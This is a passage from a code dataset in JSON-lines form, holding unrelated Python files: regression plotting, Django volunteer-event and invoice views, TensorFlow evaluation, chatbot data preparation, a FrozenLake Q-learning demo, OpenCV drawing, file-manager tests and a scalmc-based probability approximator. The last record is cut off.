y=[2,4,5,4,5]\n\n # x = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n # y = np.array([1, 3, 2, 5, 
7, 8, 8, 9, 10, 12])\n\n worker= Data(x,y)\n worker.CalcData()\n worker.CalcM()\n worker.CalcC() \n worker.PrintData() \n\n \n\n #Points \n plt.plot(x,y,\"o\")\n #Line\n plt.plot(worker.CalcPlot()[0], worker.CalcPlot()[1], 'r-', lw=3)\n #plt.axis([0, 105, 0, 105])\n plt.xlabel(\"independant\")\n plt.ylabel(\"dependant\") \n\n\n\n plt.show()\n\n\n\nif __name__== \"__main__\":\n Foo()\n","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"265559330","text":"#-*- coding: cp950 -*-\r\nimport sys,cgi,re,time,os,datetime\r\nfrom django.http import HttpResponse\r\nfrom django.shortcuts import render_to_response\r\nfrom django.template import TemplateDoesNotExist\r\nfrom django.http import HttpResponseRedirect\r\nfrom google.appengine.ext import db\r\nfrom google.appengine.api import users\r\nfrom db import ddl\r\nimport flowBase\r\n\r\ndef showEvent(request):\r\n # Retrieve Events from Database\r\n eventKey=request.GET.get('id')\r\n event=db.get(db.Key(eventKey))\r\n if not event:\r\n return HttpResponseRedirect('/')\r\n intVolunteerNeeded = event.volunteer_req - event.approved_count\r\n\r\n if event.min_age == 1 and event.max_age != 99:\r\n event.req_age = u'%d 歲以下' % event.max_age\r\n elif event.min_age != 1 and event.max_age == 99:\r\n event.req_age = u'%d 歲以上' % event.min_age\r\n elif event.min_age != 1 and event.max_age != 99:\r\n event.req_age = u'%d 歲至 %d 歲' % (event.min_age, event.max_age)\r\n\r\n dicData={'event': event,\r\n 'event_key':event.key(),\r\n 'base': flowBase.getBase(request, 'event'),\r\n 'page': 'home',\r\n 'needed': str(intVolunteerNeeded)}\r\n return render_to_response(r'event/event_home.html',dicData)\r\n\r\ndef applyEvent(request):\r\n eventKey=request.POST.get('event_key')\r\n if not eventKey or eventKey=='None':\r\n return HttpResponseRedirect('/')\r\n event=db.get(db.Key(eventKey))\r\n if not event:\r\n return HttpResponseRedirect('/')\r\n\r\n objUser=users.get_current_user()\r\n if not objUser:\r\n return HttpResponseRedirect(users.create_login_url(cgi.escape(request.path+'?event_id=%s'%eventKey)))\r\n objVolunteer=flowBase.getVolunteer(objUser)\r\n if not objVolunteer:\r\n template_values = {\r\n 'base': flowBase.getBase(request, 'event'),\r\n 'redirectURI': cgi.escape(request.path+'?event_id=%s'%eventKey),\r\n 'loginSuccess': False,\r\n }\r\n return render_to_response('loginProxy.html', template_values)\r\n \r\n intVolunteerEventItems = db.GqlQuery('select * from VolunteerEvent where volunteer_profile_ref = :1 and event_profile_ref = :2', objVolunteer, event).count()\r\n if intVolunteerEventItems > 0:\r\n strAlert=u'此活動您已經報名了'\r\n else:\r\n event.registerUser(objVolunteer)\r\n strAlert=u'報名成功 '\r\n\r\n dicData={'event': event,\r\n 'event_key':event.key(),\r\n 'base': flowBase.getBase(request, 'event'),\r\n 'needed': str(event.volunteer_req - event.approved_count),\r\n 'alertMsg':strAlert}\r\n return render_to_response(r'event/event_home.html',dicData)\r\n \r\n\r\ndef EmptyApply(request):\r\n eventKey=request.POST.get('event_id')\r\n #return HttpResponse(str(eventKey))\r\n EventProfile = db.GqlQuery('select * from EventProfile')\r\n for event in EventProfile:\r\n event.registered_count=0\r\n #event.registered_volunteer=[]\r\n event.put()\r\n\r\n VolunteerEvent = db.GqlQuery(\"select * from VolunteerEvent\")\r\n for item in VolunteerEvent:\r\n item.delete()\r\n return 
HttpResponse(u'已刪除VolunteerEvent所有資料,與清除EventProfile相對應欄位')\r\n\r\n","sub_path":"flow1.0/src/flow-site/eventView/eventInfo.py","file_name":"eventInfo.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293621292","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, sys\nimport time\nimport argparse\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom model import Model\n\nimport load as ld\nimport pandas as pd\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n\n parser.add_argument('--model', type=str, default='lstm',\n help='rnn, gru, lstm or bn-lstm, default lstm')\n\n parser.add_argument('--bn_level', type=int, default=1,\n help='if model is bn-lstm, enable sequence-wise batch normalization with different level')\n\n parser.add_argument('--rnn_size', type=int, default=256,\n help='size of RNN hidden state')\n\n parser.add_argument('--num_layers', type=int, default=2,\n help='number of layers in RNN')\n\n parser.add_argument('--batch_size', type=int, default=1,\n help='minibatch size')\n\n parser.add_argument('--seq_length', type=int, default=40,\n help='RNN sequence length')\n\n parser.add_argument('--num_epochs', type=int, default=100,\n help='number of epochs')\n\n parser.add_argument('--learning_rate', type=float, default=0.0001,\n help='learning rate')\n\n parser.add_argument('--decay_rate', type=float, default=0.9,\n help='decay rate for rmsprop')\n\n parser.add_argument('--init_from', type=str, default=\"./data/\",\n help='''continue training from saved model at this path. Path must contain files saved by previous training process:\n 'config.pkl' : configuration;\n 'checkpoint' : paths to model file(s) (created by tensorflow).\n Note: this file contains absolute paths, be careful when moving files around;\n 'model.ckpt-*' : file(s) with model definition (created by tensorflow)''')\n parser.add_argument('--label_size',type=int,default=2000)\n args = parser.parse_args()\n train(args)\n\n\ndef train(args):\n file=open(\"/media/ada/软件/BaiduNetdiskDownload/ieee_zhihu_cup/ieee_zhihu_cup/question_eval.csv\",\"a\")\n topic_info = pd.read_csv(\"/media/ada/软件/BaiduNetdiskDownload/ieee_zhihu_cup/ieee_zhihu_cup/topic_num.txt\",\n header=None, sep=\"\\t\")\n char_embedding = ld.load_char_embedding()\n args.vocab_size = char_embedding.shape[0]\n\n global ckpt\n if args.init_from is not None:\n ckpt = tf.train.get_checkpoint_state(args.init_from)\n\n model = Model(args,True)\n\n\n #word_embedding = ld.load_word_embedding()\n\n\n\n\n with tf.Session() as sess:\n\n init = tf.global_variables_initializer()\n sess.run(init)\n saver = tf.train.Saver()\n\n if args.init_from is not None:\n saver.restore(sess, ckpt.model_checkpoint_path)\n\n num = 0\n header_list = []\n for i in range(1, 257, 1):\n header_list.append(str(i))\n x_ = []\n temp = []\n for i in range(256):\n temp.append(0)\n with open(\"/media/ada/软件/BaiduNetdiskDownload/ieee_zhihu_cup/ieee_zhihu_cup/question_eval_set.txt\",\"r\") as f:\n question_des = True\n # for i in range(200): #已经训练了200代\n # question_topic=f.readline().strip(\"\\n\").split(\"\\t\")\n while (True):\n\n question_des = f.readline().strip(\"\\n\").split(\"\\t\")\n num += 1\n if (num == 216467):\n break\n while (question_des):\n question_des = f.readline().strip(\"\\n\").split(\"\\t\")\n num+=1\n\n question_id = question_des[0]\n\n question_ct = question_des[1].split(\",\")\n '''\n question_wt = \\\n question_des.loc[question_des['question_id'] == 
int(question_id)][['question_name_word']].values[0][\n 0].split(\",\")\n question_cd = \\\n question_des.loc[question_des['question_id'] == int(question_id)][['question_des_char']].values[0][\n 0].split(\",\")\n question_wd = \\\n question_des.loc[question_des['question_id'] == int(question_id)][['question_des_word']].values[0][\n 0].split(\",\")\n '''\n\n question_ct_embedding = []\n\n\n\n if(len(question_ct)>args.seq_length):\n question_ct=question_ct[:args.seq_length]\n\n for question_ct_ in question_ct:\n if (len(char_embedding.loc[char_embedding['char'] == question_ct_]) == 0):\n temp = np.random.rand(256)\n question_ct_embedding.append(temp)\n\n\n\n\n else:\n question_ct_embedding.append(\n char_embedding.loc[char_embedding['char'] == question_ct_][header_list].values[0])\n\n while(len(question_ct_embedding)priority[n]):\n for k in range(3,n-1,-1):\n priority[k+1]=priority[k]\n index[k+1]=index[k]\n index[n] = m\n priority[n] = probablity[m]\n break\n\n\n\n\n print(num,question_id)\n buffer=str(question_id)\n #file.write(str(question_id))\n for k__ in range(5):\n #file.write(\",\"+str(topic_info[1][index[k__]]))\n buffer=buffer+(\",\"+str(topic_info[1][index[k__]]))\n #file.write(\"\\n\")\n buffer+=(\"\\n\")\n file.write(buffer)\n x_=[]\n if(num%10==0):\n file.flush()\n\n\n\n file.close()\nif __name__ == '__main__':\n main()\n\n","sub_path":"my_eval.py","file_name":"my_eval.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"9798659","text":"import logging\nfrom django.core.management.base import BaseCommand\n\nfrom twitterbot.tasks import get_followers_and_friends_task\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n\n help = 'Loads followers for given twitter user ' \\\n 'and saves them to DB (TargetTwitterAccount table)'\n\n def add_arguments(self, parser):\n parser.add_argument('username', nargs='+', type=str)\n parser.add_argument('account_owner', nargs='+', type=str)\n\n parser.add_argument(\n '--include-friends',\n action=\"store_true\",\n dest='friends',\n default=False,\n help='Additionally loads friends of twitter user'\n )\n\n def handle(self, *args, **options):\n self.stdout.write('Start process')\n get_followers_and_friends_task.delay(options)\n self.stdout.write('Process is executed in async mode. 
Enjoy!')\n","sub_path":"twitterbot/management/commands/getfollowers.py","file_name":"getfollowers.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"266936315","text":"#We import the necessary packages for our chatbot and initialize the variables we will use in our python project\r\n#The Data file is in JSON format so we used the json package to parse the JSON file into Python.\r\n\r\nimport nltk\r\nfrom nltk.stem import WordNetLemmatizer\r\nlemmatizer = WordNetLemmatizer()\r\nimport json\r\nimport pickle\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation, Dropout\r\nfrom keras.optimizers import SGD\r\nimport random\r\n\r\nwords=[]\r\nclasses=[]\r\ndocuments=[]\r\nignore_words=['?', '!']\r\ndata_file = open('intents.json').read()\r\nintents = json.loads(data_file)\r\n\r\n#Process data\r\n#Iterate through the patterns and tokenize the sentence using nltk.word_tokenize() and append each word in the words list.\r\nfor intent in intents['intents']:\r\n    for pattern in intent['patterns']:\r\n        #tokenize each word\r\n        w = nltk.word_tokenize(pattern)\r\n        words.extend(w)\r\n        #Add documents in the corpus\r\n        documents.append((w, intent['tag']))\r\n        #add to our classes list\r\n        if intent['tag'] not in classes:\r\n            classes.append(intent['tag'])\r\n\r\n#Lemmatizing is the process of converting a word into its lemma form and then creating a pickle file to store the python objects\r\n#which we will use while predicting.\r\n\r\n#Lemmatize, lower each word and remove duplicates\r\nwords = [lemmatizer.lemmatize(w.lower()) for w in words if w not in ignore_words]\r\nwords = sorted(list(set(words)))\r\n#sort classes\r\nclasses = sorted(list(set(classes)))\r\n#Documents = combination between patterns and intents \r\nprint (len(documents), \"documents\")\r\n#Classes = intents \r\nprint (len(classes), \"classes\", classes)\r\n#Words = all words, vocabulary\r\nprint (len(words), \"unique lemmatized words\", words)\r\n\r\npickle.dump(words,open('words.pkl', 'wb'))\r\npickle.dump(classes,open('classes.pkl', 'wb'))\r\n\r\n#Create training and testing data\r\n#input = pattern // output = class our input pattern belongs to \r\n#But we need to convert text into numbers.\r\n\r\n#create our training data\r\ntraining = []\r\n#create an empty array for our output\r\noutput_empty = [0] * len(classes)\r\n#training set, bag of words for each sentence\r\nfor doc in documents:\r\n    #initialize our bag of words\r\n    bag = []\r\n    #list of tokenized words for the pattern \r\n    pattern_words = doc[0]\r\n    #lemmatize each word - create base word, in attempt to represent related words\r\n    pattern_words = [lemmatizer.lemmatize(word.lower()) for word in pattern_words]\r\n    #create our bag of words array with 1, if word match found in current pattern \r\n    for w in words:\r\n        bag.append(1) if w in pattern_words else bag.append(0)\r\n    #output is a '0' for each tag and '1' for current tag (for each pattern)\r\n    output_row = list(output_empty)\r\n    output_row[classes.index(doc[1])] = 1\r\n\r\n    training.append([bag, output_row])\r\n\r\n#shuffle our features and turn into np.array\r\nrandom.shuffle(training)\r\ntraining = np.array(training)\r\n#create train and test lists. 
X - patterns, Y - intents\r\ntrain_x = list(training[:,0])\r\ntrain_y = list(training[:,1])\r\nprint(\"Training data created\")\r\n\r\n","sub_path":"DataScience_ML_DL_Projects/ChatBot/train_chatbot.py","file_name":"train_chatbot.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"563749579","text":"# %%\n\nimport numpy as np\nimport gym\nimport random\nimport time\nfrom IPython.display import clear_output\n\n# %%\n\n\nenv = gym.make(\"FrozenLake-v0\")\n\naction_space_size = env.action_space.n\nstate_space_size = env.observation_space.n\n\nq_table = np.zeros((state_space_size, action_space_size))\n\nprint(q_table)\n\n# %%\n\n\nnum_episodes = 10000\nmax_steps_per_episode = 100\n\nlearning_rate = 0.1\ndiscount_rate = 0.99\n\nexploration_rate = 1\nmax_exploration_rate = 1\nmin_exploration_rate = 0.001\nexploration_decay_rate = 0.001\n# %%\n# Watch our agent play Frozen Lake by playing the best action \n# from each state according to the Q-table\n\nfor episode in range(3):\n # initialize new episode params\n state = env.reset()\n done = False\n print(\"*****EPISODE \", episode+1, \"*****\\n\\n\\n\\n\")\n time.sleep(1)\n for step in range(max_steps_per_episode): \n\n clear_output(wait=True)\n env.render()\n time.sleep(0.3)\n\n # Show current state of environment on screen\n # Choose action with highest Q-value for current state \n # Take new action\n action = np.argmax(q_table[state,:]) \n new_state, reward, done, info = env.step(action)\n\n if done:\n clear_output(wait=True)\n env.render()\n if reward == 1:\n print(\"****You reached the goal!****\")\n time.sleep(3)\n else:\n print(\"****You fell through a hole!****\")\n time.sleep(3)\n clear_output(wait=True)\n break\n\n # Set new state\n state = new_state\nenv.close()\n","sub_path":"ReinforcementLearning/FrozenLake.py","file_name":"FrozenLake.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"12477697","text":"# file_manager_test.py\n# Author: Daniel Jauregui\n\nimport unittest\nimport os\nimport datetime\nfrom random import randint\nimport sys\nsys.path.append(os.path.abspath(os.path.dirname(__file__)) + \"/../src/lib\")\nfrom file_manager import File\n\n\nclass FileManagerTest(unittest.TestCase):\n SRC_FOLDER = os.path.abspath(os.path.dirname(__file__)) + '/data/'\n CONFIG_FILE = SRC_FOLDER + 'config.cfg'\n CONFIG_DB_FILE = SRC_FOLDER + 'db.cfg'\n CREATE_FILE = SRC_FOLDER + 'Test_File.txt'\n DELETE_FILE = SRC_FOLDER + 'Test_to_deleted.txt'\n ADD_TEXT_FILE = SRC_FOLDER + 'Add_Text_to_File.txt'\n CONFIG_FILE_UPDATE = SRC_FOLDER + 'config_to_update.cfg'\n\n def test_file_manager_can_read_config_file(self):\n file_instance = File(self.CONFIG_FILE)\n file_to_compare = open(self.CONFIG_FILE).read()\n self.assertEqual(file_to_compare, file_instance.read_content())\n\n def test_file_manager_can_get_a_tupe_of_config_file(self):\n file_instance = File(self.CONFIG_FILE)\n x = file_instance.get_tuple_of_file()\n self.assertGreater(len(x), 0)\n\n def test_file_manager_can_get_all_config_from_file(self):\n file_instance = File(self.CONFIG_FILE)\n self.assertEqual(\n file_instance.read_config_parser(\"JSONPARSER\", \"op\"), '0')\n self.assertEqual(file_instance.read_config_parser(\n \"JSONPAHT\", \"json_path\"), 'data/config.json')\n self.assertEqual(\n file_instance.read_config_parser(\"CONFIG_FILE\", \"id\"), '510')\n self.assertEqual(\n 
file_instance.read_config_parser(\"ENVIRONMENT\", \"env\"), 'PFIZERUS')\n        self.assertEqual(\n            file_instance.read_config_parser(\"DBNAME\", \"name\"), 'pfizerjaprod')\n\n    def test_file_manager_can_get_all_config_db_from_file(self):\n        file_instance = File(self.CONFIG_DB_FILE)\n        self.assertEqual(file_instance.read_config_parser(\n            \"AKTANADEV\", \"host\"), 'google.aktana.com')\n        self.assertEqual(\n            file_instance.read_config_parser(\"AKTANADEV\", \"user\"), 'user')\n        self.assertEqual(\n            file_instance.read_config_parser(\"AKTANADEV\", \"pwd\"), 'password')\n\n    def test_file_manager_can_create_overwrite_a_file(self):\n        file_instance = File(self.CREATE_FILE)\n        if file_instance.file_exists() is False:\n            file_instance.write_content(\"This is my own test text \"\n                                        \"created\\r\\nby me\")\n        else:\n            file_instance.write_content(\"This is my own test text \"\n                                        \"overwritten\\r\\nby me\")\n        self.assertTrue(file_instance.file_exists())\n\n    def test_file_manager_can_write_a_text_in_a_file(self):\n        file_instance = File(self.ADD_TEXT_FILE)\n        result = False\n        if file_instance.file_exists() is True:\n            result = file_instance.add_content(\"\\r\\nThis Line was added at %s\"\n                                               % (datetime.datetime.now()))\n        self.assertTrue(result)\n\n    def test_file_manager_can_delete_a_file(self):\n        file_instance = File(self.DELETE_FILE)\n        file_instance.write_content(\"To be deleted\\r\\nby me\")\n        result = False\n        if file_instance.file_exists() is True:\n            result = file_instance.delete()\n        self.assertTrue(result)\n\n    def test_file_manager_can_update_a_value_in_config_file(self):\n        file_instance = File(self.CONFIG_FILE_UPDATE)\n        new_value = randint(1, 700)\n        file_instance.change_value_config(\"CONFIG_FILE\", \"id\", str(new_value))\n        self.assertEqual(file_instance.read_config_parser(\"CONFIG_FILE\", \"id\"),\n                         str(new_value))\n","sub_path":"test/file_manager_test.py","file_name":"file_manager_test.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"425094759","text":"from source.uart.uart import Uart\nfrom source.module import Module\nfrom pathlib import Path\nimport os\nimport math\n\n\nclass Gimbal(Module):\n\tdef __init__(self, parent=None, state=None):\n\t\tself.working_dir = Path(os.path.dirname(os.path.abspath(__file__)))\n\t\tsuper().__init__(self.working_dir, parent=parent, state=state)\n\t\tself.uart = Uart()\n\t\n\tdef truncate_angle(self, angle):\n\t\t\"\"\"\n\t\tTruncates angle to be in range of -180 to 180 degrees\n\n\t\t:param angle: angle to be truncated in degrees\n\t\t:type angle: float\n\t\t:return: 180 if angle is greater than 180, -180 if angle is less than -180, otherwise the same angle\n\t\t:rtype: float\n\t\t\"\"\"\n\t\tif angle > 180:\n\t\t\treturn 180\n\t\telif angle < -180:\n\t\t\treturn -180\n\t\treturn angle\n\n\t# Processes screen coords and frame and converts them to a set of angles\n\t# returns delta angles\n\tdef process(self, x, y, frame_dims):\n\t\t\"\"\"\n\t\tProcesses screen coords and frame and converts them to a set of angles\n\n\t\t:param x: x-coordinate of the target on the screen, in pixels\n\t\t:type x: float\n\t\t:param y: y-coordinate of the target on the screen, in pixels\n\t\t:type y: float\n\t\t:param frame_dims: (width, height) of the frame, in pixels\n\t\t:type frame_dims: tuple\n\t\t:return: delta x and y angles\n\t\t:rtype: tuple of two floats\n\t\t\"\"\"\n\t\tadjusted_x = (frame_dims[0] / 2) - x\n\t\tadjusted_y = (frame_dims[1] / 2) - y\n\t\thoriz_angle = (adjusted_x / (frame_dims[0] / 2)) * self.properties[\"horiz_fov\"]\n\t\tvert_angle = (adjusted_y / (frame_dims[1] / 2)) * 
self.properties[\"vert_fov\"]\n\t\treturn self.truncate_angle(horiz_angle), self.truncate_angle(vert_angle)\n","sub_path":"source/gimbal/gimbal.py","file_name":"gimbal.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"597454913","text":"import cv2\nimport numpy as np\nimport pickle\nimport mathrecog as mr\ncap = cv2.VideoCapture(0)\n\npoints = []\n\nflag = 0\n\nwhile(1):\n\n _,frame = cap.read()\n frame = cv2.flip(frame,1)\n\n filterFrame = cv2.GaussianBlur(frame,(35,35),25)\n\n hsvFrame = cv2.cvtColor(filterFrame,cv2.COLOR_BGR2HSV)\n with open('range.pickle','rb') as f:\n t = pickle.load(f)\n lower_bound = np.array([t[0],t[1],t[2]])\n upper_bound = np.array([t[3],t[4],t[5]])\n\n\n threshImg = cv2.inRange(hsvFrame,lower_bound,upper_bound) \n\n _,contours,_ = cv2.findContours(threshImg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n finalImg = cv2.bitwise_and(frame,frame,mask=threshImg)\n\n finalImg = cv2.drawContours(finalImg,contours,-1,(255,255,0),1)\n\n c,X,Y=0,0,0\n\n key = cv2.waitKey(1)\n\n if flag==1:\n for item in contours:\n for i in item :\n X += i[0][0]\n Y += i[0][1]\n c += 1\n\n try: \n points.append([int(X/c),int(Y/c)]) \n except:\n pass\n\n if (key & 0xFF == ord('s')) and flag == 0:\n flag = 1\n\n elif key & 0xFF == ord('s') and flag == 1 :\n flag = 0\n for p in points:\n cv2.circle(finalImg,tuple(p),20,(250,250,250),-1) \n\n cv2.imshow('Draw',finalImg)\n\n if key & 0xFF == ord('q'):\n cv2.imwrite('new.jpg', cv2.bitwise_not(finalImg))\n cap.release()\n cv2.destroyAllWindows()\n break\n\ncv2.destroyAllWindows()\n#cap.release()\n\nmr.test()\n\n\n","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"183561450","text":"import subprocess, os, sys\nimport time\nimport argparse\nfrom partition_random_sample import *\nimport math\n#################\n### argparser ###\n#################\nparser = argparse.ArgumentParser()\nparser.add_argument(\"aiger_file\", help = \"path to aiger circuit unrolling\")\nparser.add_argument(\"aiger_source\", help = \"path to aiger source\")\nparser.add_argument(\"-k\", \"--num_partition_variables\", help = \"number of partitioning variables\", type = int, default = -1)\nparser.add_argument(\"-e\", \"--epsilon\", help = \"epsilon bound on answer with 99% probability\", type = float, default = 2)\nparser.add_argument(\"-ap\", \"--actual_probability\", help = \"don't calculate the exact probability; just use this number\", type = float, default = -1)\nparser.add_argument(\"--method\", action='store', choices=[\"3n/4\",\"n/2\", \"n-5\", \"nlogn\"], help='partitioning technique')\nparser.add_argument(\"--threshold\", help='number of iterations to convergence')\nparser.add_argument(\"--convergence_limit\", help='number of iterations to convergence')\nparser.add_argument(\"--ignore_original\", help = \"run scalmc on the original model\", action = \"store_true\")\nparser.add_argument(\"--ignore_partition\", help = \"run scalmc on the original model\", action = \"store_true\")\nargs = parser.parse_args()\nrun_on_partition = not args.ignore_partition\nrun_on_original = not args.ignore_original\naiger_file = args.aiger_file.split('.a')[0].split('.cnf')[0]\nk = int(args.num_partition_variables)\nnum_clauses = 0\noriginal_count = 0\nn = 0\n#count the number of solutions in the aiger file, generate cnf from aiger 
file\nos.system(\"./../aiger-1.9.9/aigand \" + aiger_file + \".aig \" + aiger_file + \"and.aig\")\nos.system(\"./../aiger-1.9.9/aigtoaig \" + aiger_file + \"and.aig \" + aiger_file + \".aag\")\nos.system(\"aigcompose \" + args.aiger_source + \" \" + aiger_file + \".aag \" + aiger_file + \"out.aag\")\nos.system(\"python3 aigtocnf_ind.py \" + aiger_file + \"out.aag \" + aiger_file + \".cnf \")\nfilename = aiger_file + \".cnf\"\n\nwith open(filename, 'r') as f:\n found = False\n while not found:\n x = f.readline()\n if \"c ind\" in x:\n n += len(x.split(' ')) - 3\n elif \"p cnf \" in x:\n num_clauses = int(x.split(' ')[-1])\n found = True\n if n is 0:\n n = int(x.split(' ')[-2])\n\nprint(\"File: \" + filename.split('/')[-1].split('.')[0])\n\n#set the parameters appropriately\nepsilon_main = float(args.epsilon)\nepsilon_partition = .01\npivotAC_main = int(math.ceil(9.84 * (1 + (epsilon_main / (1.0 + epsilon_main))) * (1 + (1.0/epsilon_main)) * (1 + (1.0/epsilon_main))))\npivotAC_partition = int(math.ceil(9.84 * (1 + (epsilon_partition / (1.0 + epsilon_partition))) * (1 + (1.0/epsilon_partition)) * (1 + (1.0/epsilon_partition))))\n\n\n#SCALMC ON ORIGINAL\nif run_on_original:\n ##count number of original solutions\n start = time.time()\n info = os.popen(\"./../maxcount/scalmc --pivotAC \" + str(pivotAC_main) + \" --delta .01 \" + filename).readlines()[-1]\n num_sols = info.split(': ')[1].split(' x ')\n base, exp = int(num_sols[1].split('^')[0]), int(num_sols[1].split('^')[1].strip(\"\\n\"))\n original_count += int(num_sols[0]) * base**exp\n end = time.time()\n original_time = end - start\n j = 0\n while original_count % (2**(j+1)) == 0:\n j += 1\n original_count_str = str(original_count/(2**j)) + \" x 2^\" + str(j)\n print(\"Original Probability: \" + str(float(original_count)/(2**n)))\n print(\"epsilon for original = \" + str(epsilon_main))\n print(\"Time for original: \" + str(original_time))\n # print(\"Original Count: \" + original_count_str)\n\n#SCALMC ON PARTITIONS\nif run_on_partition:\n #if k was never specified, calculate it according to the parameters of the cnf file\n if k == -1:\n if args.method == \"3n/4\":\n k = int(.75*n)\n elif args.method == \"n/2\":\n k = int(0.5*n)\n elif args.method == \"nlogn\":\n k = int(n - math.log(n, 2))\n else: \n k = n-5\n print(\"Partitioning Technique: \" + str(args.method))\n print(\"k = \" + str(k))\n convergence_limit = float(args.convergence_limit)\n threshold = int(args.threshold)\n free_vars = n - k\n #partition the file, time it\n start = time.time()\n variable_order = get_top_vars(k, 1000, filename)\n partition_vars = variable_order[:k]\n end = time.time()\n #count number of partitioned solutions\n file_gen_time = end - start\n density_counter = 0\n density_sum = 0.0\n density = 0\n partition_time = 0\n start = time.time()\n file_counter = 0\n converged = False\n partitions = set()\n i = 0\n while not converged:\n #SCALMC ON PARTITIONS\n unsat_partition = False\n old_density = density\n assignment_str = \"\"\n generator = time.time()\n while assignment_str in partitions or assignment_str == \"\":\n assignment_str = random_string_generator(k)\n if len(partitions) == 2**k:\n converged = True\n break\n end_gen = time.time()\n partitions.add(assignment_str)\n write_partition(partition_vars, filename, i, bin_string = assignment_str)\n info = os.popen(\"./../maxcount/scalmc --pivotAC \" + str(pivotAC_partition) + \" --delta .01 \" + filename.split('.cnf')[0] + \"-window-\" + str(i) + \".cnf\").readlines()[-1]\n try:\n num_sols = info.split(': 
')[1].split(' x ')\n base, exp = int(num_sols[1].split('^')[0]), int(num_sols[1].split('^')[1].strip(\"\\n\"))\n density_sum += float(int(num_sols[0]) * (base**exp))/(2**(n-k))\n file_counter += 1\n density = density_sum/file_counter\n if abs(density - old_density) <= convergence_limit:\n density_counter += 1\n if density_counter >= threshold:\n if (not allOne and density != 1) or (allOne and density == 1):\n converged = True\n else:\n free_vars = int(free_vars * 2)\n k = n - free_vars\n density_counter = 0\n threshold = int(threshold / 2)\n if k <= 0 or threshold <= 1:\n converged = True\n density = 0\n density_sum = 0\n partition_vars = variable_order[:k]\n partitions = set()\n else:\n density_counter = 0\n except: \n file_counter += 1\n density = density_sum/file_counter\n if abs(density - old_density) > convergence_limit:\n density_counter = 0\n unsat_partition = True\n i += 1\n end = time.time()\n partition_time = end - start\n partition_count = density * 2**n\n i = 0\n # while int(partition_count) % (2**(i+1)) == 0:\n # i += 1\n # partition_count_str = str(int(partition_count)/(2**i)) + \" x 2^\" + str(i)\n print(\"Convergence Limit: \" + str(convergence_limit))\n print(\"Iterations to Convergence - Threshold: \" + str(args.threshold))\n print(\"Partitioned Probability: \" + str(float(partition_count)/(2**n)))\n print(\"Time for partitioned with partitioning overhead : {}\".format(partition_time + file_gen_time))\n print(\"Time for partitioned without partitioning overhead: {}\".format(partition_time))\n print(\"Number of partitions sampled: {}\".format(file_counter))\n # print(\"Partitioned Count: \" + partition_count_str)\n\n# if args.actual_probability == -1:\n# prob = os.popen(\"aigcount \" + aiger_file + \"out.aag\").readlines()[0][:-2]\n# else:\n# prob = args.actual_probability\n# print(\"Actual Probability: \" + str(float(prob)))\n\n# if aiger:\n# os.system(\"./../aiger-1.9.9/aigand \" + aiger_file + \".aig \" + aiger_file + \".aig\")\n# os.system(\"./../aiger-1.9.9/aigtoaig \" + aiger_file + \".aig \" + aiger_file + \".aag\")\n# os.system(\"aigcompose \" + aiger_file + \".aag \" + \"tests/raw_files/source.aag \" + aiger_file + \".aag\")\n# prob = os.system(\"aigcount \" + aiger_file + \".aag\").readlines()\n# print(\"Actual Probability: \" + str(prob))\n","sub_path":"other files/prob_approximator.py","file_name":"prob_approximator.py","file_ext":"py","file_size_in_byte":8115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"1167972","text":"from typing import List\nfrom allianceauth import notifications\nfrom corptools import app_settings\nfrom django.utils.timezone import activate\n\nfrom ninja import NinjaAPI, Form, main\nfrom ninja.security import django_auth\nfrom ninja.responses import codes_4xx\n\nfrom allianceauth.eveonline.models import EveCorporationInfo\nfrom django.core.exceptions import PermissionDenied\nfrom django.db.models import F, Sum, Q\nfrom allianceauth.eveonline.models import EveCharacter\nfrom django.conf import settings\nfrom .app_settings import PAYMENT_CORP\n\nfrom . import models\nfrom . 
import schema\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\napi = NinjaAPI(title=\"Invoice Manager API\", version=\"0.0.1\",\n               urls_namespace='invoices:api', auth=django_auth, csrf=True,\n               openapi_url=settings.DEBUG and \"/openapi.json\" or \"\")\n\n\n@api.get(\n    \"account/unpaid\",\n    response={200: List[schema.Invoice]},\n    tags=[\"Account\"]\n)\ndef get_account_invoices(request):\n    chars = request.user.character_ownerships.all().values_list('character')\n    invoices = models.Invoice.objects.visible_to(\n        request.user).filter(paid=False, character__in=chars)\n    paid = models.Invoice.objects.visible_to(\n        request.user).filter(paid=True, character__in=chars)[:5]\n    output = []\n    for i in invoices:\n        output.append(i)\n    for i in paid:\n        output.append(i)\n\n    return 200, output\n\n\n@api.get(\n    \"account/visible\",\n    response={200: List[schema.Invoice]},\n    tags=[\"Account\"]\n)\ndef get_visible_invoices(request):\n    chars = 